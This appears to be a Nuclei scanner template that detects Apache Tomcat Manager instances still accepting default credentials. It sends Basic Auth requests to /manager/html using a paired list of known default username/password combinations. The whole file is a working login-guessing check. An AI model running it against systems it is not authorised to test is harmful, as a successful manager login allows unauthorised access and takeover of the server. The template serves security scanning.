id: tomcat-default-login
info:
  name: Tomcat Manager Default Login
  author: pdteam
  severity: high
  tags: tomcat,apache,default-login

requests:
  - raw:
      - |
        GET /manager/html HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}

    payloads:
      username:
        - tomcat
        - admin
        - ovwebusr
        - j2deployer
        - cxsdk
        - ADMIN
        - xampp
        - tomcat
        - QCC
        - admin
        - root
        - role1
        - role
        - tomcat
        - admin
        - role1
        - both
        - admin

      password:
        - tomcat
        - admin
        - OvW*busr1
        - j2deployer
        - kdsxc
        - ADMIN
        - xampp
        - s3cret
        - QLogic66
        - tomcat
        - root
        - role1
        - changethis
        - changethis
        - j5Brn9
        - tomcat
        - tomcat
        - 123456

    attack: pitchfork  # Available options: sniper, pitchfork and clusterbomb

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - Apache Tomcat